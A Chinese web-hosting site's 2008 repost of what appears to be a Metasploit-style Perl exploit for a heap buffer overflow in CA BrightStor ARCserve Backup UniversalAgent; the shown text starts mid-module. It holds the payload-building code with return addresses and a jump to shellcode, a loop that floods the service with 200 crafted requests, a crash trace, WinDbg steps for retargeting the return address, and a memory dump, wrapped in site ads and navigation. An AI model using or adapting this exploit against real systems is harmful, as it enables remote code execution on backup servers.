CA BrightStor ARCserve Backup UniversalAgent缓冲区溢出漏洞

来源：互联网 作者：西部数码 时间：2008-04-09

西部数码-全国虚拟主机10强！40余项虚拟主机管理功能,全国领先!双线多线虚拟主机南北访问畅通无阻!免费赠送企业邮局,.CN域名,自助建站480元起,免费试用7天,满意再付款! P4主机租用799元/月.月付免压金!

# This should point to itself
substr($boom, 576, 4, pack('V', $target->[1]));

# This points to the code below
substr($boom, 580, 4, pack('V', $target->[1] 8 ));

# We have 95 bytes, use it to hop back to shellcode
substr($boom, 584, 6, "\x68" . pack('V', $target->[1]-320) . "\xc3");

# Stick the protocol header in front of our request
$boom = "\x00\x00\x00\x00\x03\x20\xa8\x02".$boom;

$self->PrintLine("[*] Sending " .length($boom) . " bytes to remote host.");

# We keep making new connections and triggering the fault until
# the heap is grown to encompass our known return address. Once
# this address has been allocated and filled, each subsequent
# request will result in our shellcode being executed.

for (1 .. 200) {
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $target_host,
'PeerPort' => $target_port,
);

if ($s->IsError) {
$self->PrintLine('[*] Error creating socket: ' . $s->GetError);
return;
}

if ($_ % 10 == 0) {
$self->PrintLine("[*] Sending request $_ of 200...");
}

$s->Send($boom);
$s->Close;

# Give the process time to recover from each exception
select(undef, undef, undef, 0.1);
}
return;
}

1;

__END__
012a0d91 8b8e445c0000 mov ecx,[esi 0x5c44]
012a0d97 83c404 add esp,0x4
012a0d9a 85c9 test ecx,ecx
012a0d9c 7407 jz ntagent 0x20da5 (012a0da5)
012a0d9e 8b11 mov edx,[ecx] ds:0023:41327441=???????
012a0da0 6a01 push 0x1
012a0da2 ff5204 call dword ptr [edx 0x4]

Each request will result in another chunk being allocated, the exception
causes these chunks to never be freed. The large chunk size allows us to
predict the location of our buffer and grow our buffer to where we need it.

If these addresses do not match up, run this exploit, then attach with WinDbg:

> s 0 Lfffffff 0x44 0x5c 0x61 0x01

Figure out the pattern, replace the return address, restart the service,
and run it through again. Only tested on WinXP SP1

011b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
011f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01205c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01225c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01235c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01245c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01255c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01265c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01275c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01285c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01295c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012a5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012b5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012c5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012d5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012e5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
012f5c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01305c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01315c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01525c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01535c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01545c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01555c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01565c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01575c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01585c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........
01595c44 48 5c 62 01 4c 5c 62 01-cc cc cc cc cc cc cc cc H\b.L\b.........

文章整理：西部数码--专业提供域名注册、虚拟主机服务
http://www.west263.com
以上信息与文章正文是不可分割的一部分,如果您要转载本文章,请保留以上信息，谢谢!

[打印] [关闭]

相关文章

Symantec Norton防病毒软件保留

Backdoor.Spyboter.ap.enc

上一篇：Invision Power Board 1.3.1及更低版本SQL注入漏洞
下一篇：KDE KMail HTML EMail远程欺骗Email内容漏洞

热点关注

IDC资讯虚拟主机域名注册托管租用 vps主机智能建站
网站运营建站经验策划盈利搜索优化网站推广免费资源
网站联盟联盟新闻联盟介绍联盟点评网赚技巧
行业资讯业界动态搜索引擎网络游戏门户动态电子商务广告传媒
网络编程 Asp.Net编程 Asp编程 Php编程 Xml编程 Access Mssql Mysql 其它
服务器技术 Web服务器 Ftp服务器 Mail服务器 Dns服务器安全防护
软件技巧其它软件 Word Excel Powerpoint Ghost Vista QQ空间 QQ FlashGet 迅雷 Internet Explorer
网页制作 FrontPages Dreamweaver Javascript css photoshop fireworks Flash
程序设计 Java技术 C/C++ VB delphi
网络知识网络协议网络安全网络管理组网方案 Cisco技术
操作系统 Win2000 WinXP Win2003 Mac OS Linux FreeBSD

版权所有西部数码(www.west263.com)
CopyRight (c) 2002~2007 west263.com all right reserved.
公司地址：四川成都市万和路90号天象大厦4楼　邮编：610031
电话总机：028-86263408 86263960 86264018 86267838 86262244 86263408
售前咨询：总机转201 202 203 204 205 206 207 208
售后服务：总机转211 212 213 214 217 218 晚上0点以后拔分机225